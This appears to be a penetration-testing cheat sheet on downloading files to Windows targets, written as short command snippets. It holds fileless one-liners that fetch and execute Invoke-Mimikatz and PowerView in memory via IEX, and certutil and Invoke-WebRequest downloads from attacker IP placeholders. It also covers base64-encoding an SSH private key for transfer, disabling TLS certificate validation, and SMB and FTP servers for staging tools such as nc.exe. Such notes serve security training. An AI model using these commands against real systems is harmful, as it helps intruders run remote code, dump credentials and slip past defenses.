Windows - Download

- `fileless`: a threat that doesn't come in a file but runs in memory. # Go-to ```powershell certutil -urlcache -split -f http://<IP>/<FILE> <SAVE_NAME> ``` # PowerShell Base64 Encode & Decode this method is convenient, but it's not always possible to use. Windows CMD has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings. Check file MD5 Hash ```bash md5sum id_rsa ``` Encode SSH Key to Base64 ```bash cat id_rsa | base64 -w 0;echo LS0tLS1CRUd... ``` Decode with PowerShell functions ```powershell PS C:\wook> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1CRUd...")) ``` Confirm the MD5 hashes match ```powershell Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 ``` # PowerShell Web Downloads In any version of PowerShell, the `System.Net.WebClient` class can be used to download a file over HTTP, HTTPS, or FTP. The following table describes WebClient methods for downloading data from a resource. **DownloadFile** ```powershell PS C:\wook> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>') PS C:\wook> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1') ``` **DownloadString - Fileless Method** - Instead of downloading a PowerShell script to disk, we can run it directly in memory using the `Invoke-Expression` cmdlet or the alias `IEX` ```powershell PS C:\wook> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') PS C:\wook> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX ``` **PowerShell Invoke-WebRequest** ```powershell Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 ``` # Common Errors with PowerShell There may be cases when the Internet Explorer first-launch config has not been completed, which prevents the download ```powershell # Errors PS C:\wook> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX # Bypass PS C:\wook> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX ``` SSL/TLS secure channel error ```powershell # SSL/TLS Errors PS C:\wook> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') # Bypass PS C:\wook> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` # SMB Downloads we can use SMB to download files. We need to create an SMB server with [[smbserver.py]] from Impacket and then use `copy`, `move`, PowerShell `copy-Item`, or any other tool that allows connection to SMB create the SMB server ```bash sudo impacket-smbserver share -smb2support /tmp/smbshare ``` copy a file from the SMB server ```powershell copy \\<IP>\share\nc.exe ``` --- create the SMB server with a username and password ```bash sudo impacket-server share -smb2support /tmp/smbshare -user test -password test ``` Mount the SMB Server with username and password ```powershell net use n: \\<IP>\share /user:test test ``` # FTP Downloads installing the FTP server Python3 Module - `pyftpdlib` ```bash sudo pip3 install pyftpdlib # pyftpdlib uses port 2121 by default ``` setting up a python3 FTP server ```bash python3 -m pyftpdlib --port 21 ``` after the FTP server is set up, we can perform file transfers using the pre-installed FTP client from Windows or PowerShell `Net.WebClient` ```powershell PS C:\wook> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt') ```